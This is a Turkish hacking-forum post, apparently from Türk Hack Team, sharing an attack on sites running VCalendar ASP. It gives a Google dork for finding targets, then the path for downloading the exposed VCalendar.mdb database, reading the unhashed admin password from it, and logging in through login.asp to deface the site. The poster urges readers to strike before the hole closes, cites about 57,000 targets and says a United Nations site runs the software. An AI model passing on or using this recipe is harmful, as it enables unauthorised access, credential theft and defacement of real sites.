THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

GünceL VCalendar.mdb Açığı

Hakan Soylu - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2012
Nereden:
Ş.URFA !
Mesajlar:
766
Konular:
453
Teşekkür (Etti):
67
Teşekkür (Aldı):
316
Ticaret:
(0) %
10-04-2012 21:34
#1
Exclamation
GünceL VCalendar.mdb Açığı
DB'yi çekip login oluyon iş bitiyo

YanLız Elinizi Çabuk Tutun AçıkLar her an Kapanıyo oLabiLir.Açık Sıcakken hack ın Tadına varın

KuLLanması Çok basit !!

Dork : "inurl:vcalendar_asp"

Exploit :

https://tik.lat/mS55P .[target].com/[path]/vcalendar_asp/db/VCalendar.mdb [bu şekilde db'yi çekicez ve users kolonuna bakım adminin şifresini alcaz ]

https://tik.lat/IF5wD .[target].com/[path]/vcalendar_asp/login.asp [Bunula da admin kullanıcı adı ve şifresiyle login olcaz ve hacklicez ]
[Admin şifresi hash falan deil ]

Baya bi site var 57.000 sonuç çıkıyo google'da...Gerçekten deface kasmak için bire bir bi açıktır.

Not: Diyceksiniz ki denendimi ? evet denendi

Birleşmiş milletlerin sitesinde bile bu sistem var ve açık. Ancak login yapılamıyor.
https://tik.lat/PIkaV
---------------------
İleride birgün gemim olursa adını Rahatlık koyacağım ;
Bir aksilik olurda batarsa , Rahatlık battı desinler
pusufaresi, kralsensizim, byliderxxx Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler